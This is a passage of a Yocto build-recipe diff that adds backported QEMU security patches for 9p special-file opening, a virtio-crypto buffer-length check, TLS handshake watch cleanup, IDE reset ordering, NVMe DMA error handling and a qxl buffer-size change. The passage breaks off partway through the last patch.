+Reviewed-by: Greg Kurz <groug@kaod.org>
+Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <E1q6w7r-0000Q0-NM@lizzy.crudebyte.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/f6b0de53fb87ddefed348a39284c8e2f28dc4eda]
+CVE: CVE-2023-2861
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ fsdev/virtfs-proxy-helper.c | 27 +++++++++++++++++++++++--
+ hw/9pfs/9p-util.h           | 40 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 2 deletions(-)
+
+diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
+index 6f132c5f..300c9765 100644
+--- a/fsdev/virtfs-proxy-helper.c
++++ b/fsdev/virtfs-proxy-helper.c
+@@ -26,6 +26,7 @@
+ #include "qemu/xattr.h"
+ #include "9p-iov-marshal.h"
+ #include "hw/9pfs/9p-proxy.h"
++#include "hw/9pfs/9p-util.h"
+ #include "fsdev/9p-iov-marshal.h"
+ 
+ #define PROGNAME "virtfs-proxy-helper"
+@@ -350,6 +351,28 @@ static void resetugid(int suid, int sgid)
+     }
+ }
+ 
++/*
++ * Open regular file or directory. Attempts to open any special file are
++ * rejected.
++ *
++ * returns file descriptor or -1 on error
++ */
++static int open_regular(const char *pathname, int flags, mode_t mode)
++{
++    int fd;
++
++    fd = open(pathname, flags, mode);
++    if (fd < 0) {
++	return fd;
++    }
++
++    if (close_if_special_file(fd) < 0) {
++	return -1;
++    }
++
++    return fd;
++}
++
+ /*
+  * send response in two parts
+  * 1) ProxyHeader
+@@ -694,7 +717,7 @@ static int do_create(struct iovec *iovec)
+     if (ret < 0) {
+         goto unmarshal_err_out;
+     }
+-    ret = open(path.data, flags, mode);
++    ret = open_regular(path.data, flags, mode);
+     if (ret < 0) {
+         ret = -errno;
+     }
+@@ -719,7 +742,7 @@ static int do_open(struct iovec *iovec)
+     if (ret < 0) {
+         goto err_out;
+     }
+-    ret = open(path.data, flags);
++    ret = open_regular(path.data, flags, 0);
+     if (ret < 0) {
+         ret = -errno;
+     }
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 546f46dc..79fdd2a3 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -13,12 +13,16 @@
+ #ifndef QEMU_9P_UTIL_H
+ #define QEMU_9P_UTIL_H
+ 
++#include "qemu/error-report.h"
++
+ #ifdef O_PATH
+ #define O_PATH_9P_UTIL O_PATH
+ #else
+ #define O_PATH_9P_UTIL 0
+ #endif
+ 
++#define qemu_fstat      fstat
++
+ static inline void close_preserve_errno(int fd)
+ {
+     int serrno = errno;
+@@ -26,6 +30,38 @@ static inline void close_preserve_errno(int fd)
+     errno = serrno;
+ }
+ 
++/**
++ * close_if_special_file() - Close @fd if neither regular file nor directory.
++ *
++ * @fd: file descriptor of open file
++ * Return: 0 on regular file or directory, -1 otherwise
++ *
++ * CVE-2023-2861: Prohibit opening any special file directly on host
++ * (especially device files), as a compromised client could potentially gain
++ * access outside exported tree under certain, unsafe setups. We expect
++ * client to handle I/O on special files exclusively on guest side.
++ */
++static inline int close_if_special_file(int fd)
++{
++    struct stat stbuf;
++
++    if (qemu_fstat(fd, &stbuf) < 0) {
++	close_preserve_errno(fd);
++	return -1;
++    }
++    if (!S_ISREG(stbuf.st_mode) && !S_ISDIR(stbuf.st_mode)) {
++	error_report_once(
++	    "9p: broken or compromised client detected; attempt to open "
++	    "special file (i.e. neither regular file, nor directory)"
++	);
++	close(fd);
++	errno = ENXIO;
++	return -1;
++    }
++
++    return 0;
++}
++
+ static inline int openat_dir(int dirfd, const char *name)
+ {
+     return openat(dirfd, name,
+@@ -56,6 +92,10 @@ again:
+         return -1;
+     }
+ 
++    if (close_if_special_file(fd) < 0) {
++	return -1;
++    }
++
+     serrno = errno;
+     /* O_NONBLOCK was only needed to open the file. Let's drop it. We don't
+      * do that with O_PATH since fcntl(F_SETFL) isn't supported, and openat()
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
new file mode 100644
index 0000000000..7144bdca46
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
@@ -0,0 +1,49 @@
+From 9d38a8434721a6479fe03fb5afb150ca793d3980 Mon Sep 17 00:00:00 2001
+From: zhenwei pi <pizhenwei@bytedance.com>
+Date: Thu, 3 Aug 2023 10:43:13 +0800
+Subject: [PATCH] virtio-crypto: verify src&dst buffer length for sym request
+
+For symmetric algorithms, the length of ciphertext must be as same
+as the plaintext.
+The missing verification of the src_len and the dst_len in
+virtio_crypto_sym_op_helper() may lead buffer overflow/divulged.
+
+This patch is originally written by Yiming Tao for QEMU-SECURITY,
+resend it(a few changes of error message) in qemu-devel.
+
+Fixes: CVE-2023-3180
+Fixes: 04b9b37edda("virtio-crypto: add data queue processing handler")
+Cc: Gonglei <arei.gonglei@huawei.com>
+Cc: Mauro Matteo Cascella <mcascell@redhat.com>
+Cc: Yiming Tao <taoym@zju.edu.cn>
+Signed-off-by: zhenwei pi <pizhenwei@bytedance.com>
+Message-Id: <20230803024314.29962-2-pizhenwei@bytedance.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+Upstream-Status: Backport from [https://gitlab.com/qemu-project/qemu/-/commit/9d38a8434721a6479fe03fb5afb150ca793d3980]
+CVE: CVE-2023-3180
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ hw/virtio/virtio-crypto.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/virtio/virtio-crypto.c b/hw/virtio/virtio-crypto.c
+index 44faf5a522b..13aec771e11 100644
+--- a/hw/virtio/virtio-crypto.c
++++ b/hw/virtio/virtio-crypto.c
+@@ -634,6 +634,11 @@ virtio_crypto_sym_op_helper(VirtIODevice *vdev,
+         return NULL;
+     }
+ 
++    if (unlikely(src_len != dst_len)) {
++        virtio_error(vdev, "sym request src len is different from dst len");
++        return NULL;
++    }
++
+     max_len = (uint64_t)iv_len + aad_len + src_len + dst_len + hash_result_len;
+     if (unlikely(max_len > vcrypto->conf.max_size)) {
+         virtio_error(vdev, "virtio-crypto too big length");
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
new file mode 100644
index 0000000000..2942e84cac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
@@ -0,0 +1,87 @@
+From 10be627d2b5ec2d6b3dce045144aa739eef678b4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
+Date: Tue, 20 Jun 2023 09:45:34 +0100
+Subject: [PATCH] io: remove io watch if TLS channel is closed during handshake
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The TLS handshake make take some time to complete, during which time an
+I/O watch might be registered with the main loop. If the owner of the
+I/O channel invokes qio_channel_close() while the handshake is waiting
+to continue the I/O watch must be removed. Failing to remove it will
+later trigger the completion callback which the owner is not expecting
+to receive. In the case of the VNC server, this results in a SEGV as
+vnc_disconnect_start() tries to shutdown a client connection that is
+already gone / NULL.
+
+CVE-2023-3354
+Reported-by: jiangyegen <jiangyegen@huawei.com>
+Signed-off-by: Daniel P. Berrangé <berrange@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/10be627d2b5ec2d6b3dce045144aa739eef678b4]
+CVE: CVE-2023-3354
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ include/io/channel-tls.h |  1 +
+ io/channel-tls.c         | 18 ++++++++++++------
+ 2 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/include/io/channel-tls.h b/include/io/channel-tls.h
+index fdbdf12f..e49e2831 100644
+--- a/include/io/channel-tls.h
++++ b/include/io/channel-tls.h
+@@ -49,6 +49,7 @@ struct QIOChannelTLS {
+     QIOChannel *master;
+     QCryptoTLSSession *session;
+     QIOChannelShutdown shutdown;
++    guint hs_ioc_tag;
+ };
+ 
+ /**
+diff --git a/io/channel-tls.c b/io/channel-tls.c
+index 7ec8ceff..8b32fbde 100644
+--- a/io/channel-tls.c
++++ b/io/channel-tls.c
+@@ -194,12 +194,13 @@ static void qio_channel_tls_handshake_task(QIOChannelTLS *ioc,
+         }
+ 
+         trace_qio_channel_tls_handshake_pending(ioc, status);
+-        qio_channel_add_watch_full(ioc->master,
+-                                   condition,
+-                                   qio_channel_tls_handshake_io,
+-                                   data,
+-                                   NULL,
+-                                   context);
++        ioc->hs_ioc_tag =
++            qio_channel_add_watch_full(ioc->master,
++                                       condition,
++                                       qio_channel_tls_handshake_io,
++                                       data,
++                                       NULL,
++                                       context);
+     }
+ }
+ 
+@@ -214,6 +215,7 @@ static gboolean qio_channel_tls_handshake_io(QIOChannel *ioc,
+     QIOChannelTLS *tioc = QIO_CHANNEL_TLS(
+         qio_task_get_source(task));
+ 
++    tioc->hs_ioc_tag = 0;
+     g_free(data);
+     qio_channel_tls_handshake_task(tioc, task, context);
+ 
+@@ -371,6 +373,10 @@ static int qio_channel_tls_close(QIOChannel *ioc,
+ {
+     QIOChannelTLS *tioc = QIO_CHANNEL_TLS(ioc);
+ 
++    if (tioc->hs_ioc_tag) {
++        g_clear_handle_id(&tioc->hs_ioc_tag, g_source_remove);
++    }
++
+     return qio_channel_close(tioc->master, errp);
+ }
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
new file mode 100644
index 0000000000..db02210fa4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
@@ -0,0 +1,114 @@
+From 7d7512019fc40c577e2bdd61f114f31a9eb84a8e Mon Sep 17 00:00:00 2001
+From: Fiona Ebner <f.ebner@proxmox.com>
+Date: Wed, 6 Sep 2023 15:09:21 +0200
+Subject: [PATCH] hw/ide: reset: cancel async DMA operation before resetting
+ state
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If there is a pending DMA operation during ide_bus_reset(), the fact
+that the IDEState is already reset before the operation is canceled
+can be problematic. In particular, ide_dma_cb() might be called and
+then use the reset IDEState which contains the signature after the
+reset. When used to construct the IO operation this leads to
+ide_get_sector() returning 0 and nsector being 1. This is particularly
+bad, because a write command will thus destroy the first sector which
+often contains a partition table or similar.
+
+Traces showing the unsolicited write happening with IDEState
+0x5595af6949d0 being used after reset:
+
+> ahci_port_write ahci(0x5595af6923f0)[0]: port write [reg:PxSCTL] @ 0x2c: 0x00000300
+> ahci_reset_port ahci(0x5595af6923f0)[0]: reset port
+> ide_reset IDEstate 0x5595af6949d0
+> ide_reset IDEstate 0x5595af694da8
+> ide_bus_reset_aio aio_cancel
+> dma_aio_cancel dbs=0x7f64600089a0
+> dma_blk_cb dbs=0x7f64600089a0 ret=0
+> dma_complete dbs=0x7f64600089a0 ret=0 cb=0x5595acd40b30
+> ahci_populate_sglist ahci(0x5595af6923f0)[0]
+> ahci_dma_prepare_buf ahci(0x5595af6923f0)[0]: prepare buf limit=512 prepared=512
+> ide_dma_cb IDEState 0x5595af6949d0; sector_num=0 n=1 cmd=DMA WRITE
+> dma_blk_io dbs=0x7f6420802010 bs=0x5595ae2c6c30 offset=0 to_dev=1
+> dma_blk_cb dbs=0x7f6420802010 ret=0
+
+> (gdb) p *qiov
+> $11 = {iov = 0x7f647c76d840, niov = 1, {{nalloc = 1, local_iov = {iov_base = 0x0,
+>       iov_len = 512}}, {__pad = "\001\000\000\000\000\000\000\000\000\000\000",
+>       size = 512}}}
+> (gdb) bt
+> #0  blk_aio_pwritev (blk=0x5595ae2c6c30, offset=0, qiov=0x7f6420802070, flags=0,
+>     cb=0x5595ace6f0b0 <dma_blk_cb>, opaque=0x7f6420802010)
+>     at ../block/block-backend.c:1682
+> #1  0x00005595ace6f185 in dma_blk_cb (opaque=0x7f6420802010, ret=<optimized out>)
+>     at ../softmmu/dma-helpers.c:179
+> #2  0x00005595ace6f778 in dma_blk_io (ctx=0x5595ae0609f0,
+>     sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+>     io_func=io_func@entry=0x5595ace6ee30 <dma_blk_write_io_func>,
+>     io_func_opaque=io_func_opaque@entry=0x5595ae2c6c30,
+>     cb=0x5595acd40b30 <ide_dma_cb>, opaque=0x5595af6949d0,
+>     dir=DMA_DIRECTION_TO_DEVICE) at ../softmmu/dma-helpers.c:244
+> #3  0x00005595ace6f90a in dma_blk_write (blk=0x5595ae2c6c30,
+>     sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+>     cb=cb@entry=0x5595acd40b30 <ide_dma_cb>, opaque=opaque@entry=0x5595af6949d0)
+>     at ../softmmu/dma-helpers.c:280
+> #4  0x00005595acd40e18 in ide_dma_cb (opaque=0x5595af6949d0, ret=<optimized out>)
+>     at ../hw/ide/core.c:953
+> #5  0x00005595ace6f319 in dma_complete (ret=0, dbs=0x7f64600089a0)
+>     at ../softmmu/dma-helpers.c:107
+> #6  dma_blk_cb (opaque=0x7f64600089a0, ret=0) at ../softmmu/dma-helpers.c:127
+> #7  0x00005595ad12227d in blk_aio_complete (acb=0x7f6460005b10)
+>     at ../block/block-backend.c:1527
+> #8  blk_aio_complete (acb=0x7f6460005b10) at ../block/block-backend.c:1524
+> #9  blk_aio_write_entry (opaque=0x7f6460005b10) at ../block/block-backend.c:1594
+> #10 0x00005595ad258cfb in coroutine_trampoline (i0=<optimized out>,
+>     i1=<optimized out>) at ../util/coroutine-ucontext.c:177
+
+Signed-off-by: Fiona Ebner <f.ebner@proxmox.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Tested-by: simon.rowe@nutanix.com
+Message-ID: <20230906130922.142845-1-f.ebner@proxmox.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7d7512019fc40c577e2bdd61f114f31a9eb84a8e]
+CVE: CVE-2023-5088
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/ide/core.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/hw/ide/core.c b/hw/ide/core.c
+index b5e0dcd29b2..63ba665f3d2 100644
+--- a/hw/ide/core.c
++++ b/hw/ide/core.c
+@@ -2515,19 +2515,19 @@ static void ide_dummy_transfer_stop(IDEState *s)
+ 
+ void ide_bus_reset(IDEBus *bus)
+ {
+-    bus->unit = 0;
+-    bus->cmd = 0;
+-    ide_reset(&bus->ifs[0]);
+-    ide_reset(&bus->ifs[1]);
+-    ide_clear_hob(bus);
+-
+-    /* pending async DMA */
++    /* pending async DMA - needs the IDEState before it is reset */
+     if (bus->dma->aiocb) {
+         trace_ide_bus_reset_aio();
+         blk_aio_cancel(bus->dma->aiocb);
+         bus->dma->aiocb = NULL;
+     }
+ 
++    bus->unit = 0;
++    bus->cmd = 0;
++    ide_reset(&bus->ifs[0]);
++    ide_reset(&bus->ifs[1]);
++    ide_clear_hob(bus);
++
+     /* reset dma provider too */
+     if (bus->dma->ops->reset) {
+         bus->dma->ops->reset(bus->dma);
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
new file mode 100644
index 0000000000..0fdae8351a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
@@ -0,0 +1,146 @@
+From ea2a7c7676d8eb9d1458eaa4b717df46782dcb3a Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:07:17 -0700
+Subject: [PATCH 2/2] hw/block/nvme: handle dma errors
+
+Handling DMA errors gracefully is required for the device to pass the
+block/011 test ("disable PCI device while doing I/O") in the blktests
+suite.
+
+With this patch the device sets the Controller Fatal Status bit in the
+CSTS register when failing to read from a submission queue or writing to
+a completion queue; expecting the host to reset the controller.
+
+If DMA errors occur at any other point in the execution of the command
+(say, while mapping the PRPs), the command is aborted with a Data
+Transfer Error status code.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c       | 41 +++++++++++++++++++++++++++++++----------
+ hw/block/trace-events |  3 +++
+ 2 files changed, 34 insertions(+), 10 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index e6f24a6..bda446d 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,14 +60,14 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+     return addr >= low && addr < hi;
+ }
+ 
+-static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
++static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+     if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+         memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+-        return;
++        return 0;
+     }
+ 
+-    pci_dma_read(&n->parent_obj, addr, buf, size);
++    return pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+ 
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+@@ -152,6 +152,7 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+     hwaddr trans_len = n->page_size - (prp1 % n->page_size);
+     trans_len = MIN(len, trans_len);
+     int num_prps = (len >> n->page_bits) + 1;
++    int ret;
+ 
+     if (unlikely(!prp1)) {
+         trace_nvme_err_invalid_prp();
+@@ -178,7 +179,11 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ 
+             nents = (len + n->page_size - 1) >> n->page_bits;
+             prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+-            nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++            ret = nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++            if (ret) {
++                trace_pci_nvme_err_addr_read(prp2);
++                return NVME_DATA_TRAS_ERROR;
++            }
+             while (len != 0) {
+                 uint64_t prp_ent = le64_to_cpu(prp_list[i]);
+ 
+@@ -191,8 +196,12 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+                     i = 0;
+                     nents = (len + n->page_size - 1) >> n->page_bits;
+                     prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+-                    nvme_addr_read(n, prp_ent, (void *)prp_list,
+-                        prp_trans);
++                    ret = nvme_addr_read(n, prp_ent, (void *)prp_list,
++                                         prp_trans);
++                    if (ret) {
++                        trace_pci_nvme_err_addr_read(prp_ent);
++                        return NVME_DATA_TRAS_ERROR;
++                    }
+                     prp_ent = le64_to_cpu(prp_list[i]);
+                 }
+ 
+@@ -286,6 +295,7 @@ static void nvme_post_cqes(void *opaque)
+     NvmeCQueue *cq = opaque;
+     NvmeCtrl *n = cq->ctrl;
+     NvmeRequest *req, *next;
++    int ret;
+ 
+     QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
+         NvmeSQueue *sq;
+@@ -295,15 +305,21 @@ static void nvme_post_cqes(void *opaque)
+             break;
+         }
+ 
+-        QTAILQ_REMOVE(&cq->req_list, req, entry);
+         sq = req->sq;
+         req->cqe.status = cpu_to_le16((req->status << 1) | cq->phase);
+         req->cqe.sq_id = cpu_to_le16(sq->sqid);
+         req->cqe.sq_head = cpu_to_le16(sq->head);
+         addr = cq->dma_addr + cq->tail * n->cqe_size;
++        ret = pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
++                            sizeof(req->cqe));
++        if (ret) {
++            trace_pci_nvme_err_addr_write(addr);
++            trace_pci_nvme_err_cfs();
++            n->bar.csts = NVME_CSTS_FAILED;
++            break;
++        }
++        QTAILQ_REMOVE(&cq->req_list, req, entry);
+         nvme_inc_cq_tail(cq);
+-        pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
+-            sizeof(req->cqe));
+         QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
+     }
+     if (cq->tail != cq->head) {
+@@ -888,7 +904,12 @@ static void nvme_process_sq(void *opaque)
+ 
+     while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
+         addr = sq->dma_addr + sq->head * n->sqe_size;
+-        nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
++        if (nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd))) {
++            trace_pci_nvme_err_addr_read(addr);
++            trace_pci_nvme_err_cfs();
++            n->bar.csts = NVME_CSTS_FAILED;
++            break;
++        }
+         nvme_inc_sq_head(sq);
+ 
+         req = QTAILQ_FIRST(&sq->req_list);
+diff --git a/hw/block/trace-events b/hw/block/trace-events
+index c03e80c..4e4ad4e 100644
+--- a/hw/block/trace-events
++++ b/hw/block/trace-events
+@@ -60,6 +60,9 @@ nvme_mmio_shutdown_set(void) "shutdown bit set"
+ nvme_mmio_shutdown_cleared(void) "shutdown bit cleared"
+ 
+ # nvme traces for error conditions
++pci_nvme_err_addr_read(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_addr_write(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_cfs(void) "controller fatal status"
+ nvme_err_invalid_dma(void) "PRP/SGL is too small for transfer size"
+ nvme_err_invalid_prplist_ent(uint64_t prplist) "PRP list entry is null or not page aligned: 0x%"PRIx64""
+ nvme_err_invalid_prp2_align(uint64_t prp2) "PRP2 is not page aligned: 0x%"PRIx64""
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
new file mode 100644
index 0000000000..66ada52efb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
@@ -0,0 +1,55 @@
+From 55428706d5b0b8889b8e009eac77137bb556a4f0 Mon Sep 17 00:00:00 2001
+From: Klaus Jensen <k.jensen@samsung.com>
+Date: Tue, 9 Jun 2020 21:03:17 +0200
+Subject: [PATCH 1/2] hw/block/nvme: refactor nvme_addr_read
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Pull the controller memory buffer check to its own function. The check
+will be used on its own in later patches.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Maxim Levitsky <mlevitsk@redhat.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Message-Id: <20200609190333.59390-7-its@irrelevant.dk>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+---
+ hw/block/nvme.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index 12d8254..e6f24a6 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -52,14 +52,22 @@
+ 
+ static void nvme_process_sq(void *opaque);
+ 
++static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
++{
++    hwaddr low = n->ctrl_mem.addr;
++    hwaddr hi  = n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size);
++
++    return addr >= low && addr < hi;
++}
++
+ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+-    if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+-                addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
++    if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+         memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+-    } else {
+-        pci_dma_read(&n->parent_obj, addr, buf, size);
++        return;
+     }
++
++    pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+ 
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
new file mode 100644
index 0000000000..f380be486c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
@@ -0,0 +1,236 @@
+From 5a44a01c9eca6507be45d107c27377a3e8d0ee8c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:39 +0100
+Subject: [PATCH] hw/display/qxl: Pass requested buffer size to qxl_phys2virt()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Currently qxl_phys2virt() doesn't check for buffer overrun.
+In order to do so in the next commit, pass the buffer size
+as argument.
+
+For QXLCursor in qxl_render_cursor() -> qxl_cursor() we
+verify the size of the chunked data ahead, checking we can
+access 'sizeof(QXLCursor) + chunk->data_size' bytes.
+Since in the SPICE_CURSOR_TYPE_MONO case the cursor is
+assumed to fit in one chunk, no change are required.
+In SPICE_CURSOR_TYPE_ALPHA the ahead read is handled in
+qxl_unpack_chunks().
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Acked-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-4-philmd@linaro.org>
+
+Backport and rebase patch to fix compile error which imported by CVE-2022-4144.patch:
+
+/qxl.c: In function 'qxl_phys2virt':
+| /home/hitendra/work/yocto-work/cgx-data/dunfell-3.1/x86-generic-64-5.4-3.1-cgx/project/tmp/work/i586-montavistamllib32-linux/lib32-qemu/4.2.0-r0.8/qemu-4.2.0/hw/display/qxl.c:1508:67: error: 'size' undeclared (first use in this function); did you mean 'gsize'?
+|  1508 |         if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+|       |                                                                   ^~~~
+|       |                                                                   gsize
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/61c34fc && https://gitlab.com/qemu-project/qemu/-/commit/8efec0ef8bbc1e75a7ebf6e325a35806ece9b39f]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl-logger.c | 22 +++++++++++++++++++---
+ hw/display/qxl-render.c | 20 ++++++++++++++++----
+ hw/display/qxl.c        | 17 +++++++++++------
+ hw/display/qxl.h        |  3 ++-
+ 4 files changed, 48 insertions(+), 14 deletions(-)
+
+diff --git a/hw/display/qxl-logger.c b/hw/display/qxl-logger.c
+index 2ec6d8fa..031ddfec 100644
+--- a/hw/display/qxl-logger.c
++++ b/hw/display/qxl-logger.c
+@@ -106,7 +106,7 @@ static int qxl_log_image(PCIQXLDevice *qxl, QXLPHYSICAL addr, int group_id)
+     QXLImage *image;
+     QXLImageDescriptor *desc;
+ 
+-    image = qxl_phys2virt(qxl, addr, group_id);
++    image = qxl_phys2virt(qxl, addr, group_id, sizeof(QXLImage));
+     if (!image) {
+         return 1;
+     }
+@@ -216,7 +216,8 @@ int qxl_log_cmd_cursor(PCIQXLDevice *qxl, QXLCursorCmd *cmd, int group_id)
+                 cmd->u.set.position.y,
+                 cmd->u.set.visible ? "yes" : "no",
+                 cmd->u.set.shape);
+-        cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id);
++        cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id,
++                               sizeof(QXLCursor));
+         if (!cursor) {
+             return 1;
+         }
+@@ -238,6 +239,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ {
+     bool compat = ext->flags & QXL_COMMAND_FLAG_COMPAT;
+     void *data;
++    size_t datasz;
+     int ret;
+ 
+     if (!qxl->cmdlog) {
+@@ -249,7 +251,20 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+             qxl_name(qxl_type, ext->cmd.type),
+             compat ? "(compat)" : "");
+ 
+-    data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++    switch (ext->cmd.type) {
++    case QXL_CMD_DRAW:
++        datasz = compat ? sizeof(QXLCompatDrawable) : sizeof(QXLDrawable);
++        break;
++    case QXL_CMD_SURFACE:
++        datasz = sizeof(QXLSurfaceCmd);
++        break;
++    case QXL_CMD_CURSOR:
++        datasz = sizeof(QXLCursorCmd);
++        break;
++    default:
++        goto out;
++    }
++    data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id, datasz);
+     if (!data) {
+         return 1;
+     }
+@@ -271,6 +286,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+         qxl_log_cmd_cursor(qxl, data, ext->group_id);
+         break;
+     }
++out:
+     fprintf(stderr, "\n");
